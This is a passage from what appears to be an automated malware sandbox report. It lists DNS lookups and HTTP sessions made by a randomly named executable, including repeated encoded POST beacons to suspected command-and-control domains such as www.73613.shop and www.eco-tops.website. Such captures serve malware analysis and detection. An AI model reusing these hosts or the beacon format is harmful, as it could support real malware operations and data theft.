                                                                                    Nov 6, 2024 20:34:24.723900080 CET8050018216.40.34.41192.168.2.4
                                                                                    Nov 6, 2024 20:34:24.723948956 CET5001880192.168.2.4216.40.34.41
                                                                                    Nov 6, 2024 20:34:25.729453087 CET5001880192.168.2.4216.40.34.41

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 6, 2024 20:32:35.504540920 CET5154053192.168.2.41.1.1.1
                                                                                    Nov 6, 2024 20:32:36.115096092 CET53515401.1.1.1192.168.2.4
                                                                                    Nov 6, 2024 20:33:20.977049112 CET5844353192.168.2.41.1.1.1
                                                                                    Nov 6, 2024 20:33:20.990058899 CET53584431.1.1.1192.168.2.4
                                                                                    Nov 6, 2024 20:33:36.671788931 CET6145053192.168.2.41.1.1.1
                                                                                    Nov 6, 2024 20:33:36.684624910 CET53614501.1.1.1192.168.2.4
                                                                                    Nov 6, 2024 20:33:50.499422073 CET5237053192.168.2.41.1.1.1
                                                                                    Nov 6, 2024 20:33:50.554245949 CET53523701.1.1.1192.168.2.4
                                                                                    Nov 6, 2024 20:34:03.936585903 CET5924053192.168.2.41.1.1.1
                                                                                    Nov 6, 2024 20:34:03.960000038 CET53592401.1.1.1192.168.2.4
                                                                                    Nov 6, 2024 20:34:17.733086109 CET6207153192.168.2.41.1.1.1
                                                                                    Nov 6, 2024 20:34:18.485666990 CET53620711.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 6, 2024 20:32:35.504540920 CET192.168.2.41.1.1.10x1bebStandard query (0)www.evolutioncosmetics.comA (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:20.977049112 CET192.168.2.41.1.1.10x8e52Standard query (0)www.regents.healthA (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:36.671788931 CET192.168.2.41.1.1.10x8b81Standard query (0)www.73613.shopA (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:50.499422073 CET192.168.2.41.1.1.10xb2bfStandard query (0)www.eco-tops.websiteA (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:34:03.936585903 CET192.168.2.41.1.1.10xfb67Standard query (0)www.astrext.infoA (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:34:17.733086109 CET192.168.2.41.1.1.10x4fd3Standard query (0)www.newhopetoday.appA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 6, 2024 20:32:36.115096092 CET1.1.1.1192.168.2.40x1bebNo error (0)www.evolutioncosmetics.comevolutioncosmetics.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Nov 6, 2024 20:32:36.115096092 CET1.1.1.1192.168.2.40x1bebNo error (0)evolutioncosmetics.com69.27.100.185A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:20.990058899 CET1.1.1.1192.168.2.40x8e52No error (0)www.regents.healthregents.healthCNAME (Canonical name)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:20.990058899 CET1.1.1.1192.168.2.40x8e52No error (0)regents.health3.33.130.190A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:20.990058899 CET1.1.1.1192.168.2.40x8e52No error (0)regents.health15.197.148.33A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:36.684624910 CET1.1.1.1192.168.2.40x8b81No error (0)www.73613.shop180.178.39.235A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:36.684624910 CET1.1.1.1192.168.2.40x8b81No error (0)www.73613.shop180.178.39.237A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:36.684624910 CET1.1.1.1192.168.2.40x8b81No error (0)www.73613.shop180.178.39.238A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:36.684624910 CET1.1.1.1192.168.2.40x8b81No error (0)www.73613.shop180.178.39.236A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:33:50.554245949 CET1.1.1.1192.168.2.40xb2bfNo error (0)www.eco-tops.website203.161.49.193A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:34:03.960000038 CET1.1.1.1192.168.2.40xfb67No error (0)www.astrext.info217.160.0.132A (IP address)IN (0x0001)false
                                                                                    Nov 6, 2024 20:34:18.485666990 CET1.1.1.1192.168.2.40x4fd3No error (0)www.newhopetoday.app216.40.34.41A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.evolutioncosmetics.com
                                                                                    • www.regents.health
                                                                                    • www.73613.shop
                                                                                    • www.eco-tops.website
                                                                                    • www.astrext.info
                                                                                    • www.newhopetoday.app

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.4498443.33.130.190802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:21.009021997 CET526OUTGET /q97g/?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.regents.health
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:21.628855944 CET403INHTTP/1.1 200 OK
                                                                                    Server: openresty
                                                                                    Date: Wed, 06 Nov 2024 19:33:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 263
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 78 76 50 56 3d 7a 62 6b 30 41 56 66 50 45 6a 6a 68 65 26 39 68 43 74 6f 66 68 3d 4b 4b 32 31 75 57 30 78 48 76 6f 72 53 6b 32 6f 79 63 4c 6f 6f 54 30 64 64 75 7a 50 6d 31 6a 51 44 6b 32 4c 30 59 57 46 39 64 43 4b 6d 55 75 74 67 76 31 76 52 6c 7a 54 76 53 73 68 61 30 50 73 6a 67 58 31 58 5a 65 4b 35 4a 30 64 48 56 77 49 51 6d 32 42 2f 43 51 6a 64 74 67 72 34 45 38 56 35 69 73 76 6a 53 72 30 63 43 4f 77 55 70 71 6c 44 56 4b 6f 6b 31 6b 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?DxvPV=zbk0AVfPEjjhe&9hCtofh=KK21uW0xHvorSk2oycLooT0dduzPm1jQDk2L0YWF9dCKmUutgv1vRlzTvSsha0PsjgX1XZeK5J0dHVwIQm2B/CQjdtgr4E8V5isvjSr0cCOwUpqlDVKok1k="}</script></head></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449922180.178.39.235802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:36.750410080 CET775OUTPOST /tizt/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.73613.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.73613.shop
                                                                                    Referer: http://www.73613.shop/tizt/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 71 4d 38 73 51 7a 30 67 37 68 76 51 79 31 75 45 65 79 45 49 39 75 74 6e 2f 67 59 66 59 41 74 35 50 56 77 42 7a 69 53 62 30 76 6f 4b 6e 36 31 5a 75 33 73 36 75 59 53 6b 6a 2f 7a 34 57 30 68 6f 62 4e 62 31 54 58 61 6f 66 46 74 31 37 2f 34 77 63 6b 65 67 68 6b 4a 36 51 2b 51 65 2f 6e 71 56 53 33 55 48 37 53 71 4d 7a 4f 59 41 71 72 38 74 42 71 76 46 6b 4d 71 4e 4b 75 5a 6f 38 74 64 2f 50 6c 69 6f 45 63 75 70 66 66 47 33 6c 32 63 52 6a 62 46 4b 50 55 6e 66 4a 44 62 31 64 4e 32 52 76 50 45 53 4f 52 36 6f 66 72 79 45 50 39 6e 39 51 51 52 57 67 3d 3d
                                                                                    Data Ascii: 9hCtofh=nkKelaCdXUds+qM8sQz0g7hvQy1uEeyEI9utn/gYfYAt5PVwBziSb0voKn61Zu3s6uYSkj/z4W0hobNb1TXaofFt17/4wckeghkJ6Q+Qe/nqVS3UH7SqMzOYAqr8tBqvFkMqNKuZo8td/PlioEcupffG3l2cRjbFKPUnfJDb1dN2RvPESOR6ofryEP9n9QQRWg==
                                                                                    Nov 6, 2024 20:33:37.681665897 CET249INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:38 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449938180.178.39.235802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:39.297396898 CET795OUTPOST /tizt/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.73613.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.73613.shop
                                                                                    Referer: http://www.73613.shop/tizt/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 4c 38 38 76 7a 62 30 78 4c 68 6f 4f 43 31 75 4f 2b 79 41 49 39 69 74 6e 2b 6c 46 66 71 55 74 34 74 39 77 41 33 32 53 63 30 76 6f 41 48 36 38 64 75 33 33 36 75 46 76 6b 68 72 7a 34 53 55 68 6f 66 64 62 31 67 50 5a 71 50 46 76 73 72 2f 36 39 38 6b 65 67 68 6b 4a 36 55 57 36 65 2b 50 71 56 6d 4c 55 42 75 6d 74 53 6a 50 71 48 71 72 38 6e 68 71 72 46 6b 4d 59 4e 50 50 2b 6f 2f 56 64 2f 4c 68 69 72 51 49 78 6e 66 66 4d 76 46 33 72 52 7a 47 32 47 50 64 4a 41 70 54 72 31 38 49 4f 64 4a 43 65 44 2f 77 74 36 66 50 42 5a 49 30 54 77 54 74 59 4e 6f 34 37 2b 2f 4f 32 58 74 2f 59 2b 68 2f 53 35 73 31 45 4f 42 59 3d
                                                                                    Data Ascii: 9hCtofh=nkKelaCdXUds+L88vzb0xLhoOC1uO+yAI9itn+lFfqUt4t9wA32Sc0voAH68du336uFvkhrz4SUhofdb1gPZqPFvsr/698keghkJ6UW6e+PqVmLUBumtSjPqHqr8nhqrFkMYNPP+o/Vd/LhirQIxnffMvF3rRzG2GPdJApTr18IOdJCeD/wt6fPBZI0TwTtYNo47+/O2Xt/Y+h/S5s1EOBY=
                                                                                    Nov 6, 2024 20:33:40.255099058 CET249INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:41 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449950180.178.39.235802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:41.843694925 CET10877OUTPOST /tizt/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.73613.shop
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.73613.shop
                                                                                    Referer: http://www.73613.shop/tizt/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 6e 6b 4b 65 6c 61 43 64 58 55 64 73 2b 4c 38 38 76 7a 62 30 78 4c 68 6f 4f 43 31 75 4f 2b 79 41 49 39 69 74 6e 2b 6c 46 66 71 73 74 35 63 64 77 42 57 32 53 64 30 76 6f 4d 6e 36 35 64 75 32 74 36 75 64 72 6b 68 6e 46 34 55 59 68 36 6f 31 62 7a 52 50 5a 6a 50 46 76 6b 4c 2f 35 77 63 6b 58 67 68 30 4e 36 51 79 36 65 2b 50 71 56 6e 62 55 51 37 53 74 51 6a 4f 59 41 71 72 67 74 42 71 54 46 6c 6b 79 4e 50 43 4a 70 4f 31 64 2f 72 78 69 6b 44 77 78 76 66 66 43 73 46 33 7a 52 7a 4b 70 47 50 42 76 41 71 50 53 31 38 38 4f 4d 4d 6a 52 66 64 73 4e 6a 73 62 36 4d 35 4a 30 2b 44 4e 72 46 71 30 64 77 65 58 6f 4a 66 43 30 36 79 65 71 74 38 64 62 51 57 49 57 63 52 69 30 55 69 49 2f 66 2b 47 38 37 59 49 69 50 5a 32 36 4a 51 54 53 45 2b 6d 6f 63 41 66 65 32 30 52 63 6f 41 59 6b 6e 76 47 75 6d 79 38 35 73 74 4c 62 37 34 76 6d 39 55 73 46 70 30 75 75 4b 6f 34 4a 2f 39 78 6d 37 63 38 6e 67 52 38 41 41 43 38 71 79 2f 73 66 75 47 39 65 43 61 79 6b 65 4c 6b 56 52 2b 47 52 77 68 50 33 54 65 65 43 50 6c [TRUNCATED]
                                                                                    Data Ascii: 9hCtofh=nkKelaCdXUds+L88vzb0xLhoOC1uO+yAI9itn+lFfqst5cdwBW2Sd0voMn65du2t6udrkhnF4UYh6o1bzRPZjPFvkL/5wckXgh0N6Qy6e+PqVnbUQ7StQjOYAqrgtBqTFlkyNPCJpO1d/rxikDwxvffCsF3zRzKpGPBvAqPS188OMMjRfdsNjsb6M5J0+DNrFq0dweXoJfC06yeqt8dbQWIWcRi0UiI/f+G87YIiPZ26JQTSE+mocAfe20RcoAYknvGumy85stLb74vm9UsFp0uuKo4J/9xm7c8ngR8AAC8qy/sfuG9eCaykeLkVR+GRwhP3TeeCPlLwAu5kJ3kOCM9Aq8Ktvklt9kOujXzsVWhnUk4EGTSuS+m/8FXzKiDOu/QOmCl1wEXBeBmc/N3PPkfjAKS4/OQbuDIL02RZA0SAfkGpNvCcZHR2UrRGt36/OjVTLaVftE7nSNPsfeywMC+DDQRx8ZFNxF46cuiqwsADfEIKZcFMT4jtsE7LoD/bLtvbROTxyh+LSBXGdHxhHLiE1NFvT2oso8+kNWS1kTNd/JC8GLtSjpnIqRGr/KJSw2ORXuR/TYr4iSpSGOhLRVAPz8d4M4jl/G49kD8lkdM9SHF7pyygoqonbwCMJk+nNgOYu7I5o8EK42SIHPi5dNCP/qHLPUzJFeDBlxYTlwZUrL7Jo3AYdAY93u1IBXgcwH6u1jNOqypY34qBAyII3kNmI2TOgDMxZjuo4udQ2AwJzZ0eGt6fQjN38ZDIc0LNropvZKGJr3s+KZYdaAVYdO9rd6dqBGSgweY8Xz3wiq9z+AST7GvG+AzpBgKtoZAgr1EyqQBZwwlrRd2QE9v5emXb3qZF0IFXviHK62ugS0/q9wu7tbgorub10bnjQsTq9usJBTyfMD1yowt8hsqibgLt31TfWvASY23nbrH4hAGZztfJMDl0fpcq2j6GX7rSQfJMBJTqqgAcpQbtqnpoIYnH/La0bOdrbPVmUVMYlec9 [TRUNCATED]
                                                                                    Nov 6, 2024 20:33:42.983357906 CET249INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:43 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449965180.178.39.235802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:44.387156963 CET522OUTGET /tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.73613.shop
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:45.316689968 CET249INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:46 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.450001203.161.49.193802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:50.573832989 CET793OUTPOST /n54u/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.eco-tops.website
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.eco-tops.website
                                                                                    Referer: http://www.eco-tops.website/n54u/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 6a 6e 74 5a 73 33 6d 52 5a 37 57 5a 53 72 32 4e 2b 4e 77 4d 71 45 63 4f 6f 2b 6e 42 68 71 4a 44 39 50 47 68 6b 6c 59 71 43 2b 32 34 65 48 6d 4e 53 34 5a 56 6e 55 69 7a 51 6c 2f 49 47 64 4e 66 34 73 75 57 30 4e 75 52 6b 4c 71 41 55 72 57 64 42 67 42 2f 6c 49 67 75 64 77 58 6b 59 59 37 6b 54 4d 6b 4a 6e 51 77 54 2b 79 64 71 61 59 6e 61 7a 44 53 66 57 6d 30 46 6e 7a 62 4f 35 50 74 33 6a 62 39 68 62 43 64 61 38 71 57 41 36 2f 69 66 43 53 6b 2b 47 33 69 79 79 6b 37 2b 41 2f 78 48 56 77 54 57 46 58 64 57 50 42 38 73 62 4f 6c 77 72 6f 65 4e 54 68 68 38 62 6f 62 2f 7a 42 73 6d 6b 77 3d 3d
                                                                                    Data Ascii: 9hCtofh=jntZs3mRZ7WZSr2N+NwMqEcOo+nBhqJD9PGhklYqC+24eHmNS4ZVnUizQl/IGdNf4suW0NuRkLqAUrWdBgB/lIgudwXkYY7kTMkJnQwT+ydqaYnazDSfWm0FnzbO5Pt3jb9hbCda8qWA6/ifCSk+G3iyyk7+A/xHVwTWFXdWPB8sbOlwroeNThh8bob/zBsmkw==
                                                                                    Nov 6, 2024 20:33:51.254524946 CET533INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:51 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.450009203.161.49.193802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:33:53.125643015 CET813OUTPOST /n54u/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.eco-tops.website
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.eco-tops.website
                                                                                    Referer: http://www.eco-tops.website/n54u/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 6a 6e 74 5a 73 33 6d 52 5a 37 57 5a 51 4a 69 4e 38 71 73 4d 69 45 63 4e 31 4f 6e 42 76 4b 4a 48 39 50 4b 68 6b 6e 6f 41 44 4c 6d 34 66 69 61 4e 54 38 4e 56 6d 55 69 7a 49 56 2f 52 4c 39 4e 45 34 73 54 6c 30 4d 53 52 6b 4c 4f 41 55 72 6d 64 42 54 70 34 6b 59 67 73 4a 41 58 6d 48 49 37 6b 54 4d 6b 4a 6e 51 30 31 2b 79 46 71 62 72 50 61 7a 69 53 63 58 6d 30 45 78 6a 62 4f 75 66 73 66 6a 62 39 44 62 44 52 67 38 73 53 41 36 37 6d 66 43 44 6b 39 50 33 69 4f 73 55 37 75 49 64 6c 4d 53 7a 65 45 49 31 55 78 4a 69 55 51 54 6f 6f 71 36 5a 2f 61 42 68 46 50 47 76 53 4c 2b 43 52 76 2f 39 77 57 6d 63 4e 69 41 31 51 38 33 49 79 4a 52 46 31 36 7a 4c 30 3d
                                                                                    Data Ascii: 9hCtofh=jntZs3mRZ7WZQJiN8qsMiEcN1OnBvKJH9PKhknoADLm4fiaNT8NVmUizIV/RL9NE4sTl0MSRkLOAUrmdBTp4kYgsJAXmHI7kTMkJnQ01+yFqbrPaziScXm0ExjbOufsfjb9DbDRg8sSA67mfCDk9P3iOsU7uIdlMSzeEI1UxJiUQTooq6Z/aBhFPGvSL+CRv/9wWmcNiA1Q83IyJRF16zL0=
                                                                                    Nov 6, 2024 20:33:53.795711994 CET533INHTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:53 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
